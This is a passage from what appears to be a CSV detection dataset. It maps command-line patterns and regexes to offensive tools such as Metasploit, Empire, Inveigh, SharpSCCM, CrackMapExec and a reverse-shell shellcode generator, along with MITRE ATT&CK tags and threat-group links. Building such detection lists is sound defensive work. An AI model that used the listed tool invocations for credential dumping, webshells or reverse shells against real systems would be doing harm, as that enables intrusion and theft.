modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","1696" "* install nikto*",".{0,1000}\sinstall\snikto.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","0","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","1697" "* install samdump2*",".{0,1000}\sinstall\ssamdump2.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). 
Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","1700" "* install spraycharles*",".{0,1000}\sinstall\sspraycharles.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","1703" "* install tor2web*",".{0,1000}\sinstall\stor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by means of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","1707" "* install trufflehog*",".{0,1000}\sinstall\strufflehog.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","1708" "* install wapiti3*",".{0,1000}\sinstall\swapiti3.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","1710" "* install wfuzz*",".{0,1000}\sinstall\swfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","1711" "* install wordlists*",".{0,1000}\sinstall\swordlists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1714" "* install-sb.sh*",".{0,1000}\sinstall\-sb\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","1717" "* insTof.py*",".{0,1000}\sinsTof\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - 
TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","1718" "* intel -d * -whois*",".{0,1000}\sintel\s\-d\s.{0,1000}\s\-whois.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1719" "* interact -u http*://*/*.aspx -p *",".{0,1000}\sinteract\s\-u\shttp.{0,1000}\:\/\/.{0,1000}\/.{0,1000}\.aspx\s\-p\s.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","1720" "* interactive_shell.py*",".{0,1000}\sinteractive_shell\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1721" "* --interface * --analyze 
--disable-ess*",".{0,1000}\s\-\-interface\s.{0,1000}\s\-\-analyze\s\-\-disable\-ess.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1722" "* --interface * --analyze --lm --disable-ess*",".{0,1000}\s\-\-interface\s.{0,1000}\s\-\-analyze\s\-\-lm\s\-\-disable\-ess.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1723" "* -Internalmonologue -Command *",".{0,1000}\s\-Internalmonologue\s\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","1724" "* INTO LDAPHUNTERFINDINGS*",".{0,1000}\sINTO\sLDAPHUNTERFINDINGS.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","1725" "* Inveigh-*",".{0,1000}\sInveigh\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1726" "* Inveigh.ps1*",".{0,1000}\sInveigh\.ps1.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - 
T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1727" "* Inveigh.ps1*",".{0,1000}\sInveigh\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1728" "* Inveigh.ps1*",".{0,1000}\sInveigh\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1729" "* --invobf-args *",".{0,1000}\s\-\-invobf\-args\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1730" "* --invobf-powershell *",".{0,1000}\s\-\-invobf\-powershell\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - 
T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1731" "* invoke admin-service -q *",".{0,1000}\sinvoke\sadmin\-service\s\-q\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1732" "* invoke admin-service -q *",".{0,1000}\sinvoke\sadmin\-service\s\-q\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1733" "* invoke query *FROM SMS_Admin*",".{0,1000}\sinvoke\squery\s.{0,1000}FROM\sSMS_Admin.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1734" "* invoke_sessiongopher*",".{0,1000}\sinvoke_sessiongopher.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1735" "* invoke_vnc*",".{0,1000}\sinvoke_vnc.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1736" "* Invoke-ADSBackdoor.ps1*",".{0,1000}\sInvoke\-ADSBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1737" "* Invoke-CertToAccessToken -tenant *",".{0,1000}\sInvoke\-CertToAccessToken\s\-tenant\s.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","1738" "* Invoke-DCOM.ps1*",".{0,1000}\sInvoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","1739" "* Invoke-DCOM.ps1*",".{0,1000}\sInvoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1740" "* Invoke-DCOMPowerPointPivot.ps1*",".{0,1000}\sInvoke\-DCOMPowerPointPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1741" "* Invoke-Dump.ps1*",".{0,1000}\sInvoke\-Dump\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","1742" "* Invoke-ExcelMacroPivot.ps1*",".{0,1000}\sInvoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1743" "* Invoke-GrabTheHash*",".{0,1000}\sInvoke\-GrabTheHash.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","1744" "* Invoke-InternalMonologue.ps1*",".{0,1000}\sInvoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1745" "* Invoke-MDExclusionParser.ps1*",".{0,1000}\sInvoke\-MDExclusionParser\.ps1.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense 
Evasion","https://github.com/ViziosDe/MDExclusionParser","1","0","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","1746" "* Invoke-Mimikatz.ps1*",".{0,1000}\sInvoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1747" "* Invoke-Nightmare*",".{0,1000}\sInvoke\-Nightmare.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","0","N/A","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","1748" "* Invoke-Patamenia*",".{0,1000}\sInvoke\-Patamenia.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","1749" "* Invoke-PowerThIEf.ps1*",".{0,1000}\sInvoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1750" "* Invoke-ShareFinder 
-CheckShareAccess*",".{0,1000}\sInvoke\-ShareFinder\s\-CheckShareAccess.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","1751" "* Invoke-Stealth.ps1*",".{0,1000}\sInvoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","1752" "* Invoke-WMILM.ps1*",".{0,1000}\sInvoke\-WMILM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1754" "* Invoke-WMIRemoting.ps1*",".{0,1000}\sInvoke\-WMIRemoting\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","1755" "* --ip * --port * --type cmd --language *",".{0,1000}\s\-\-ip\s.{0,1000}\s\-\-port\s.{0,1000}\s\-\-type\scmd\s\-\-language\s.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is 
a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","0","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","1757" "* -ip * -smb2support *lwpshare* ",".{0,1000}\s\-ip\s.{0,1000}\s\-smb2support\s.{0,1000}lwpshare.{0,1000}\s","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1758" "* -IP * -SpooferIP * -HTTP N*",".{0,1000}\s\-IP\s.{0,1000}\s\-SpooferIP\s.{0,1000}\s\-HTTP\sN.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","1759" "* --ip * --variable shellcode *",".{0,1000}\s\-\-ip\s.{0,1000}\s\-\-variable\sshellcode\s.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","0","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","1760" "* ip-forwarding.nse*",".{0,1000}\sip\-forwarding\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1761" "* ip-geolocation-geoplugin.nse*",".{0,1000}\sip\-geolocation\-geoplugin\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1762" "* ip-geolocation-ipinfodb.nse*",".{0,1000}\sip\-geolocation\-ipinfodb\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability 